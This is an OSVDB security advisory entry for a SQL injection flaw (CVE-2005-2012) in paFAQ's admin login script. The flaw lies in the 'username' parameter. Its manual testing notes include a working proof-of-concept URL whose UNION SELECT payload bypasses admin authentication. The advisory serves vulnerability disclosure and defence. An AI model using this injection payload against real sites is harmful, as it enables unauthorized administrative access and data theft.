paFAQ index.php username Variable SQL Injection

2005-06-20T06:16:27
ID OSVDB:17564
Type osvdb
Reporter James Bercegay()
Modified 2005-06-20T06:16:27

Description

Vulnerability Description

paFAQ contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'username' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Technical Description

To exploit these issues "magic quotes gpc" must be off in the php.ini file. Note, this option appears to be the default settings.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

paFAQ contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'username' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[victim]/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20pafaq_admins%20WHERE%201/*&password=foobar

References:

Vendor URL: http://www.phparena.net/pafaq.php Security Tracker: 1014248 Related OSVDB ID: 17563 Related OSVDB ID: 17565 Related OSVDB ID: 17566 Related OSVDB ID: 17567 Other Advisory URL: http://www.gulftech.org/?node=research&article_id=00083-06202005 Nessus Plugin ID:18535 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0155.html ISS X-Force ID: 21077 CVE-2005-2012 Bugtraq ID: 14003